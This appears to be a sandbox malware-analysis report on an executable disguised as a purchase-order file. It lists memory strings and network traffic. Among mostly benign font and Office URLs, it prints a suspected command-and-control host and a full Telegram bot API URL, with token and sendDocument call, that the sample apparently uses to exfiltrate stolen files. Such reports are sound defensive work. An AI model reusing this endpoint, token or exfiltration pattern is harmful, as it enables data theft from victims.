                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786459331.00000000054A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comPXF
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-451
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003C42000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A2B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003C42000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A2B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49980 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49984 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49987 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49991 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49994 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50004 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50007 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50013 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50016 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50020 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50026 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50029 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50033 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50039 version: TLS 1.2
